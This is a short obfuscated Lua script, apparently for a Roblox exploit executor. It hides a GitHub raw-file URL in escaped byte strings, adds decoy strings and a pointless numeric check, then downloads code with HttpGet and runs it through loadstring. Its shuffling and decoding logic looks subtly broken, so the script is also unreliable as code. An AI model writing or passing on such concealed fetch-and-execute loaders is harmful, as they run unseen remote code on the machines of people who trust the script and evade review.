return(function(...)
local t={
"\104\116\116","\112\115\058\047\047",
"\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047",
"\108\097\114\052\055\053\053\052\054\054\045\098\105\116\047",
"\074\065\089\083\073\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047",
"\074\065\089\083\073\046\076\117\110",
"\065\065\065","\090\090","\049\050\051"
}

for i=1,#t*4 do
local a=(i*19)%#t+1
local b=(i*37)%#t+1
t[a],t[b]=t[b],t[a]
end

local function d(s)
return s:gsub("\\(%d%d?%d?)",function(n)
return string.char((tonumber(n)+1024)%256)
end)
end

local o={2,3,4,5,6}
local u=""
for _,i in ipairs(o) do
u=u..d(t[i])
end

local function n()
local x=0
for i=1,60 do
x=(x+math.floor(math.sin(i)*1e5))%1e7
end
return x
end
if n()==-1 then return end

return loadstring(game:HttpGet(u))(...)
end)(...)
